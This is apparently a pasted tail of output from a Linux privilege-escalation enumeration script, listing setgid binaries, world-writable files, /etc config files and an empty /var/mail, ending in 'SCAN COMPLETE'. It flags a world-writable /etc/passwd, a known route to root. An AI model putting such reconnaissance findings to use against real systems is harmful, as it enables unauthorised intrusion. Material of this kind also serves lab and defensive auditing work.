- -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-unlock
- -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-touchlock
- -rwxr-sr-x 1 root crontab 34824 Feb 9 2013 /usr/bin/crontab
- -rwxr-sr-x 1 root mail 13960 Dec 7 2013 /usr/bin/dotlockfile
- -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
- -rwxr-sr-x 1 root shadow 30432 Mar 16 2016 /sbin/unix_chkpwd
- [00;31mWorld-writable files (excluding /proc):[00m
- -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access
- Can't search *.conf files as no keyword was entered
- Can't search *.log files as no keyword was entered
- Can't search *.ini files as no keyword was entered
- [00;31mAll *.conf files in /etc (recursive 1 level):[00m
- -rw-r--r-- 1 root root 144 May 28 22:13 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 321 Apr 16 2014 /etc/blkid.conf
- -rw-r--r-- 1 root root 191 Dec 4 2013 /etc/libaudit.conf
- -rw-r--r-- 1 root root 1320 Aug 19 2014 /etc/rsyslog.conf
- -rw-r--r-- 1 root root 1260 Jul 1 2013 /etc/ucf.conf
- -rw-r--r-- 1 root root 92 Feb 20 2014 /etc/host.conf
- -rw-r--r-- 1 root root 4781 Nov 15 2013 /etc/hdparm.conf
- -rw-r--r-- 1 root root 2584 Oct 10 2012 /etc/gai.conf
- -rw-r--r-- 1 root root 350 May 28 22:00 /etc/popularity-contest.conf
- -rw-r--r-- 1 root root 7788 May 28 22:00 /etc/ca-certificates.conf
- -rw-r--r-- 1 root root 552 Feb 1 2014 /etc/pam.conf
- -rw-r--r-- 1 root root 2084 Apr 1 2013 /etc/sysctl.conf
- -rw-r--r-- 1 root root 956 Feb 19 2014 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 321 Jun 20 2013 /etc/updatedb.conf
- -rw-r--r-- 1 root root 14867 May 10 2014 /etc/ltrace.conf
- -rw-r--r-- 1 root root 604 Nov 7 2013 /etc/deluser.conf
- -rw-r--r-- 1 root root 34 Aug 3 2016 /etc/ld.so.conf
- -rw-r--r-- 1 root root 2969 Feb 23 2014 /etc/debconf.conf
- -rw-r--r-- 1 root root 475 Feb 20 2014 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 2981 Aug 3 2016 /etc/adduser.conf
- -rw-r----- 1 root fuse 280 May 24 2013 /etc/fuse.conf
- -rw-r--r-- 1 root root 703 Jan 22 2014 /etc/logrotate.conf
- -rw-r--r-- 1 root root 771 May 19 2013 /etc/insserv.conf
- [00;31mAny interesting mail in /var/mail:[00m
- total 8
- drwxrwsr-x 2 root mail 4096 Aug 3 2016 .
- drwxr-xr-x 14 root root 4096 May 29 18:41 ..
- [00;33m### SCAN COMPLETE ####################################[00m
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement